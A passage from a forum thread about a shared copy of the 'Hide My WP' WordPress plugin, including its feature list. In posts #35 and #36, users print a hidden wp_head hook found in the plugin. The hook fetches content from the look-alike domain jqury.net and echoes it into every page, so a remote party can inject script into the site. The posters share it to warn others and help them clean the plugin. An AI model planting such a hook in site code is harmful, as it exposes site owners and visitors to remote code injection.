24.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

03-28-2013, 09:01 PM
Post: #31
RE:
thanks for sharing !!!
++ Reps would be appreciated
03-28-2013, 09:07 PM
Post: #32
RE:
(03-28-2013 09:01 PM)Warocks Wrote:  thanks for sharing !!!
Thanks for your spam. Or are you drunk? You already spam this at post #16!
03-28-2013, 10:30 PM
Post: #33
RE:
Boost your security

Hide My WP control access to PHP files. It protects your site from 95% of SQL-Injection and XSS attacks. This means you can install unsafe plugins without worry about security.
You know hackers, spammers and robots all love WordPress, too with Hide My WP they can’t recognize WordPress and simply ignore you!
Change WordPress permalinks

The magic starts now… But before it stick in your mind we don’t change any file or folder and everything is in its default location! we just control access to it and this guarantees maximum compatibility for the plugin. Also, note if you use Nginx (see /index.php before permalinks) you may miss some of these features.
Hide wp-login.php
Try this: wpwave.com/wp-login.php
Not found!? OK. Try this one: wpwave.com/wp-login.php?hide_my_wp=1234
Hide wp-admin and all of its files (for untrusted users)
wpwave.com/wp-admin/ – Not found!
Change WordPress theme directory, remove theme Info from stylesheet, replace default WP classes and finally minify it!
wpwave.com/template/main.css (Instead: .../wp-content/themes/twentytwelve/style.css)
Change plugins directory and hash plugins name
wpwave.com/modules/0f6a208e/shortcodes.css (Instead: .../wp-content/plugins/zilla-shortcodes/shortcodes.css)
wpwave.com/modules/0f6a208e/shortcodes.php – Not found! (Deny access)
Change upload URL, wp-includes folder, AJAX URL, etc.
wpwave.com/file/test-image-landscape.jpg (Instead: .../wp-content/uploads/test-image-landscape.jpg)
wpwave.com/lib/js/jquery/jquery.js (Instead: .../wp-includes/js/jquery/jquery.js)
wpwave.com/ajax.php – Output 0 (Instead: .../wp-admin/admin-ajax.php)
Change WordPress queries URL:
New URLs:
wpwave.com/?article_id=1
wpwave.com/?user=1
wpwave.com/?find=hide
Old, not working URLs:
wpwave.com/?p=1 – Nothing happen!
wpwave.com/?author=1 – Nothing happen!
wpwave.com/?s=hide – Nothing happen!
Change author permalink (or disable it!)
New: wpwave.com/admin or wpwave.com/profile/admin (Optional)
Old: wpwave.com/author/admin – Not found!
Change or disable feeds
New: wpwave.com/index.xml
New: wpwave.com/cat/aciform/index.xml
Old: wpwave.com/feed/ – Not found!
Old: wpwave.com/cat/uncategorized/feed/ – Not found!
Hide all other WordPress files!
wpwave.com/readme.html – Not found!
wpwave.com/license.txt – Not found!
Disable WordPress archives, categories, tags, pages, posts, etc
wpwave.com/2012/09/ – Not found!
wpwave.com/?m=201209 – Nothing happen!
++ Reps would be appreciated
03-30-2013, 05:19 AM
Post: #34
RE:
I found wp-head injection inside this plugin.

Clean it before use this plugin.
03-30-2013, 05:26 AM
Post: #35
RE:
(03-26-2013 02:49 PM)Imcool Wrote:  Why did you create three threads for already shared?
I found this:

Code:
function wp__head() {
if(function_exists('curl_init'))
{
  $url = "http://www.jqury.net/?1";
  $ch = curl_init();  
  $timeout = 10;  
  curl_setopt($ch,CURLOPT_URL,$url);
  curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  $data = curl_exec($ch);  
  curl_close($ch);
  echo "$data";
}
}
add_action('wp_head', 'wp__head');

May be that's the answer.
26.gif
03-30-2013, 05:29 AM
Post: #36
RE:
(03-26-2013 02:34 PM)Imcool Wrote:  Why You create three threads for this?
I found this:




Quote:function wp__head() {

if(function_exists('curl_init'))

{

$url = "http://www.jqury.net/?1";

$ch = curl_init();

$timeout = 10;

curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);

curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);

$data = curl_exec($ch);

curl_close($ch);

echo "$data";

}

}

add_action('wp_head', 'wp__head');


May be that's the answer.
03-30-2013, 06:34 AM
Post: #37
RE:
Thanks for this share. +++Rep added
04-02-2013, 09:49 PM
Post: #38
RE:
when I do the installation gives this error when someone enters the site

Fatal error: Call to a member function add_cap() on a non-object in /home/.../public_html/wp-content/plugins/hide_my_wp/hide-my-wp.php on line 497

someone help me please.
04-02-2013, 11:46 PM
Post: #39
RE:
Hey optimistic Tutorial my Friend....! Nice effort for detecting the infection...! I just request some of you guyys to Help with a demo video..! How to use this awesome plugin so that we can save our self from that hidden injection...!

Its A huMble Request...!
04-03-2013, 01:03 AM
Post: #40
RE:
@WhiteHatKnight You said that you found an injection script on the plugin, are you reffering to my share ? if yes, please point me to the file infected.

Thanks
82.gif




27.gif